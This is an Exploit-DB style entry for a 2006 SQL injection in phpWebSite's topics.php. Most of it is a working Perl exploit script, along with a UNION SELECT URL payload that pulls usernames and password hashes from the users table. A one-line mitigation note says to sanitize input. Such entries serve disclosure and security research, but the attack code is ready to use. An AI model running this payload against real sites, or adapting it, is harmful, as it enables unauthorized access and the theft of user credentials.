phpWebSite topic SQL-Injection

vendor:

phpWebSite

by:

SnIpEr_SA and str0ke

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpWebSite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpWebSite topic SQL-Injection

This exploit allows an attacker to gain access to the user's credentials by exploiting a SQL injection vulnerability in the topics.php file of phpWebSite. The attacker can use the URL http://[server][path]/topics.php?op=viewtopic&topic=-1+Union+select+name,name,pass,name+From+users+where+uid=[uid] to gain access to the user's credentials.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# 
# advisory sent in by SnIpEr_SA (selfar2002[at]hotmail.com)
# http://www.target.com/topics.php?op=viewtopic&topic=-1%20Union%20select%20name,name,pass,name%20From%20users%20where%20uid=1
# ported by str0ke (milw0rm.com) from x97Rangs code (RST/GHC) http://rst.void.ru

use LWP::Simple;

$serv     =  $ARGV[0];
$path     =  $ARGV[1];
$uid      =  $ARGV[2];

sub usage
 {
    print "\nUsage: $0 [server] [path] [username] \n";
    print "sever    -  URL\n";
    print "path     -  path to topics.php\n";
    print "uid      -  uid of the user\n\n";
    exit ();}

sub work
 {
    print qq(
       ---------------------------------
#==---[ phpWebSite topic SQL-Injection  |
       ---------------------------------\n\n);&board}

sub board
 {
    $URL = sprintf("http://%s%s/topics.php?op=viewtopic&topic=-1+Union+select+name,name,pass,name+From+users+where+uid=%s",$serv,$path,$uid);
    $content = get "$URL";
    if ($content =~ /(\w{32})/){&showh;}else{print "... One of those days :)\n";}}

sub showh
 {
    print "[*] User: $uid Hash: $1\n\n";}

if (@ARGV != 3){&usage;}else{&work;}

# milw0rm.com [2006-02-24]